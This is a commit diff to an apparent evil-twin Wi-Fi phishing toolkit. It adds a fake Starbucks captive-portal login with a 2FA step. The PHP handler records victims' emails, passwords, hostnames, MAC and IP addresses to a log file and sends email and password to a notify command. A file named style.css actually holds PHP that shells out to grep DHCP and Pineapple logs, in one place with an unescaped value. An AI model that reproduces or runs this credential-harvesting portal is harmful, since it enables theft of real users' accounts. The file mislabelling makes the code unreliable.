Plantilla de Starbucks con 2fa funcionando

Author: s4vitar

evilTrust.sh

@@ -141,8 +141,8 @@ function startAttack(){
 	dnsmasq -C dnsmasq.conf -d > /dev/null 2>&1 &
 	sleep 5
 
-	echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Plantilla a utilizar (facebook-login, google-login, starbucks-login, twitter-login, yahoo-login, optimumwifi):${endColour} " && read template
-	cp -r $template/* .
+	tput cnorm; echo -ne "\n${yellowColour}[*]${endColour}${grayColour} Plantilla a utilizar (facebook-login, google-login, starbucks-login, twitter-login, yahoo-login, optimumwifi):${endColour} " && read template
+	tput civis; cp -r $template/* .
 	echo -e "\n${yellowColour}[*]${endColour}${grayColour} Montando servidor PHP...${endColour}"
 	php -S 192.168.1.1:80 > /dev/null 2>&1 &
 	sleep 2

starbucks-login/portal_2fa/MyPortal.php

@@ -0,0 +1,68 @@
+<?php namespace evilportal;
+
+class MyPortal extends Portal
+{
+
+    public function handleAuthorization()
+    {
+        
+        $dirs = array(
+            '/root/', 
+            '/sd/',
+        );
+
+        $dirs = array_filter($dirs, 'file_exists');
+        $dirs = array_filter($dirs, 'is_writeable');
+
+        if (empty($dirs)) {
+            die("die");
+        }
+
+        $dir = array_pop($dirs);
+        $want = $dir . DIRECTORY_SEPARATOR . 'evilportal-logs';
+
+        if (file_exists($want)) {
+        } 
+
+        else {
+            mkdir($want);
+        }
+
+        if (!file_exists($want)) {
+        }
+
+        if (!is_dir($want)) {
+        }
+
+        if (!is_writeable($want)) {
+        }
+
+        $want .= DIRECTORY_SEPARATOR;
+
+        if (isset($_POST['email'])) {
+            $email = isset($_POST['email']) ? $_POST['email'] : 'email';
+            $pwd = isset($_POST['password']) ? $_POST['password'] : 'password';
+            $hostname = isset($_POST['hostname']) ? $_POST['hostname'] : 'hostname';
+            $mac = isset($_POST['mac']) ? $_POST['mac'] : 'mac';
+            $ip = isset($_POST['ip']) ? $_POST['ip'] : 'ip';
+            file_put_contents("$dir/evilportal-logs/starbucks-login.txt", "[" . date('Y-m-d H:i:s') . "Z]\n" . "email: {$email}\npassword: {$pwd}\nhostname: {$hostname}\nmac: {$mac}\nip: {$ip}\n\n", FILE_APPEND);
+            $this->execBackground("notify $email' - '$pwd");
+        }
+        // handle form input or other extra things there
+
+        // Call parent to handle basic authorization first
+        parent::handleAuthorization();
+    }
+
+    public function onSuccess()
+    {
+        // Calls default success message
+        parent::onSuccess();
+    }
+
+    public function showError()
+    {
+        // Calls default error message
+        parent::showError();
+    }
+}

starbucks-login/portal_2fa/assets/css/bootstrap.min.css

@@ -0,0 +1,216 @@
+.form-signin
+{
+    max-width: 330px;
+    padding: 15px;
+    margin: 0 auto;
+}
+.form-signin .form-signin-heading, .form-signin .checkbox
+{
+    margin-bottom: 10px;
+}
+.form-signin .checkbox
+{
+    font-weight: normal;
+}
+.form-signin .form-control
+{
+    position: relative;
+    font-size: 16px;
+    height: auto;
+    padding: 10px;
+    -webkit-box-sizing: border-box;
+    -moz-box-sizing: border-box;
+    box-sizing: border-box;
+}
+.form-signin .form-control:focus
+{
+    z-index: 2;
+}
+.form-signin input[type="text"]
+{
+    margin-bottom: -1px;
+    border-bottom-left-radius: 0;
+    border-bottom-right-radius: 0;
+}
+.form-signin input[type="password"]
+{
+    margin-bottom: 10px;
+    border-top-left-radius: 0;
+    border-top-right-radius: 0;
+}
+.account-wall
+{
+    margin-top: 20px;
+    padding: 40px 0px 20px 0px;
+    background-color: #ffffff;
+}
+.login-title
+{
+    color: #007140;
+    font-size: 55px;
+    font-weight: 400;
+    display: block;
+}
+.profile-img
+{
+    width: 150px;
+    height: 150px;
+    margin: 0 auto 10px;
+    display: block;
+    -moz-border-radius: 50%;
+    -webkit-border-radius: 50%;
+    border-radius: 50%;
+}
+
+.friends-text
+{
+    font-size: 18px;
+    font-weight: 400;
+    display: block;
+    color: #757575;
+    padding-bottom: 15px;
+}
+
+.need-help
+{
+    margin-top: 10px;
+}
+.new-account
+{
+    display: block;
+    margin-top: 10px;
+}
+
+/*.btn-primary {
+    background: #5da522;
+    border-color: #5da522;
+    color: #ffffff;
+}
+
+.btn-primary:hover, .btn-primary:focus, .btn-primary:active, .btn-primary.active, .open > .dropdown-toggle.btn-primary {
+    background: #5da522;
+    border-color: #5da522;
+    color: #ffffff;
+}
+
+.btn-primary:active {
+    background: #5da522;
+    border-color: #5da522;
+    color: #ffffff;
+}*/
+
+.container {
+    margin: 0 auto;
+    width: 400px;
+}
+
+.terms-text1 {
+    color: #999999;
+    font-size: 15px;
+    display: block;
+    padding-top: 20px;
+}
+
+.terms-text2 {
+    color: #999999;
+    font-size: 15px;
+    display: block;
+    padding-top: 5px;
+}
+
+.terms-text3 {
+    color: #999999;
+    font-size: 15px;
+    display: block;
+    padding-top: 20px;
+}
+
+.url-color {
+    color: #6fb62f;
+    font-size: 15px;
+}
+
+.url-color:link {
+    color: #6fb62f;
+    text-decoration: none;
+}
+
+.url-color:visited {
+    color: #6fb62f;
+    text-decoration: none;
+}
+
+.url-color:hover {
+    color: #6fb62f;
+    text-decoration: none;
+}
+
+.url-color:active {
+    color: #6fb62f;
+    text-decoration: none;
+}
+
+.url-color1 {
+    color: #007140;
+}
+
+.url-color1:link {
+    color: #007140;
+    text-decoration: none;
+}
+
+.url-color1:visited {
+    color: #007140;
+    text-decoration: none;
+}
+
+.url-color1:hover {
+    color: #007140;
+    text-decoration: none;
+}
+
+.url-color1:active {
+    color: #007140;
+    text-decoration: none;
+}
+
+.btn-primary {
+    color: #FFFFFF;
+    text-shadow: 0 -1px 0 rgba(0, 0, 0, 0.25);
+    background-color: #318a00;
+    *background-color: #318a00;
+    background-image: -moz-linear-gradient(top, #65AB28, #318a00);
+    background-image: -webkit-gradient(linear, 0 0, 0 100%, from(#65AB28), to(#318a00));
+    background-image: -webkit-linear-gradient(top, #65AB28, #318a00);
+    background-image: -o-linear-gradient(top, #65AB28, #318a00);
+    background-image: linear-gradient(to bottom, #65AB28, #318a00);
+    background-repeat: repeat-x;
+    border: none;
+    filter: progid:DXImageTransform.Microsoft.gradient(startColorstr='#65AB28', endColorstr='#318a00', GradientType=0);
+    filter: progid:DXImageTransform.Microsoft.gradient(enabled=false);
+}
+
+.btn-primary:hover, 
+.btn-primary:focus,
+.btn-primary:active,
+.btn-primary.active,
+.btn-primary.disabled,
+.btn-primary[disabled] {
+    color: #FFFFFF;
+    background-color: #318a00;
+    *background-color: #318a00;
+}
+
+.btn-xlarge {
+    padding: 18px 28px;
+    font-size: 22px; //change this to your desired size
+    line-height: normal;
+    -webkit-border-radius: 8px;
+       -moz-border-radius: 8px;
+            border-radius: 8px;
+}
+
+.btn-sharp {
+    border-radius: 5px;
+}
+

starbucks-login/portal_2fa/assets/css/style.css

@@ -0,0 +1,45 @@
+<?php
+
+/**
+ * getClientMac
+ * Gets the mac address of a client by the IP address
+ * Returns the mac address as a string
+ * @param $clientIP : The clients IP address
+ * @return string
+ */
+function getClientMac($clientIP)
+{
+    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $2}'"));
+}
+
+/**
+ * getClientSSID
+ * Gets the SSID a client is associated by the IP address
+ * Returns the SSID as a string
+ * @param $clientIP : The clients IP address
+ * @return string
+ */
+function getClientSSID($clientIP)
+{
+    // Get the clients mac address. We need this to get the SSID
+    $mac = getClientMac($clientIP);
+
+    // get the path to the log file
+    $pineAPLogPath = trim(file_get_contents('/etc/pineapple/pineap_log_location'));
+
+    // get the ssid
+    return trim(exec("grep " . $mac . " " . $pineAPLogPath . "pineap.log | grep 'Association' | awk -F ',' '{print $4}'"));
+
+}
+
+/**
+ * getClientHostName
+ * Gets the host name of the connected client by the IP address
+ * Returns the host name as a string
+ * @param $clientIP : The clients IP address
+ * @return string
+ */
+function getClientHostName($clientIP)
+{
+    return trim(exec("grep " . escapeshellarg($clientIP) . " /tmp/dhcp.leases | awk '{print $4}'"));
+}